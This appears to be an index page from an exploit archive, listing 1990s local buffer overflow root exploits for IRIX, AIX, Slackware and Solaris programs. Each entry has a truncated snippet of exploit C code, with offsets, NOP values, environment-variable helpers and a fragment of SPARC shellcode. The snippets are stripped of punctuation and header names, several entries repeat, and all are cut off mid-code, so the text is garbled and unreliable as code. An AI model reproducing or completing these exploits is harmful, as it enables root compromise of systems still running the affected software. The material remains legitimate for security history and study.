IRIX 5.3 - usrsbiniwsh Local Buffer Overflow Local Privilege Escalation

IRIX 5.3 - usrsbiniwsh Local Buffer Overflow Local Privilege Escalation / /usr/sbin/iwsh.c exploit by DCRH 27/5/97 Tested on: R3000 Indigo Irix 5.3 R4400 Indy Irix 5.3 Irix 5.x only compile as: cc iwsh.c / include include include include include define NUMADDRESSES 500 define BUFLENGTH 500 define...

Slackware Linux 3.1/3.2 - 'color_xterm' Local Buffer Overflow (1)

source: https://www.securityfocus.com/bid/369/info In Slackware Linux 3.1 and 3.2, the version of color xterm included is vulnerable to a buffer overflow attack that allows for a local user to gain root access. / exploit for colorxterm, modified by zgv / / original exploit coded by Ming Zhang for...

IRIX 5.3 - '/usr/sbin/iwsh' Local Buffer Overflow / Local Privilege Escalation

/ /usr/sbin/iwsh.c exploit by DCRH 27/5/97 Tested on: R3000 Indigo Irix 5.3 R4400 Indy Irix 5.3 Irix 5.x only compile as: cc iwsh.c / include include include include include define NUMADDRESSES 500 define BUFLENGTH 500 define EXTRA 9000 define OFFSET 0x180 define GPOFFSET -0x80 define IRIXNOP...

AIX 4.2 - '/usr/dt/bin/dtterm' Local Buffer Overflow

include include include char prog100="/usr/dt/bin/dtterm"; char prog230="dtterm"; extern int execv; char createvarchar name,char value char c; int l; l=strlenname+strlenvalue+4; if ! c=mallocl perror"error allocating";exit2;; strcpyc,name; strcatc,"="; strcatc,value; putenvc; return c; /The...

AIX lquerylv - Local Buffer Overflow Local Privilege Escalation

AIX lquerylv - Local Buffer Overflow Local Privilege Escalation include include include char prog100="/usr/sbin/lquerylv"; char prog230="lquerylv"; extern int execv; char createvarchar name,char value char c; int l; l=strlenname+strlenvalue+4; if ! c=mallocl perror"error allocating";exit2;;...

SGI IRIX - binlogin Local Buffer Overflow

SGI IRIX - binlogin Local Buffer Overflow / /bin/login exploit by DCRH 24/5/97 Tested on: R3000 Indigo Irix 5.3 R4400 Indy Irix 5.3 R5000 O2 Irix 6.3 R8000 Power Challenge Irix 6.2 Compile as: cc -n32 login.c for Irix 6.x cc login.c for Irix 5.x Press enter when prompted for a password / include...

SGI IRIX - '/bin/login' Local Buffer Overflow

/ /bin/login exploit by DCRH 24/5/97 Tested on: R3000 Indigo Irix 5.3 R4400 Indy Irix 5.3 R5000 O2 Irix 6.3 R8000 Power Challenge Irix 6.2 Compile as: cc -n32 login.c for Irix 6.x cc login.c for Irix 5.x Press enter when prompted for a password / include include include include include define...

AIX lquerylv - Local Buffer Overflow / Local Privilege Escalation

include include include char prog100="/usr/sbin/lquerylv"; char prog230="lquerylv"; extern int execv; char createvarchar name,char value char c; int l; l=strlenname+strlenvalue+4; if ! c=mallocl perror"error allocating";exit2;; strcpyc,name; strcatc,"="; strcatc,value; putenvc; return c; /The...

SGI IRIX - 'LsD' Multiple Local Buffer Overflows

/ copyright by / / Last Stage of Delirium, Dec 1996, Poland/ include include include define BUFSIZE 2068 define OFFS 800 define ADDRS 3 define ALIGN 0 define ALIGN2 4 char...

Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow

--------------------------- lion24.c --------------------------------- / Solaris 2.4 / include include include include define BUFLENGTH 264 define EXTRA 36 define STACKOFFSET -56 define SPARCNOP 0xa61cc013 uchar sparcshellcode = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"...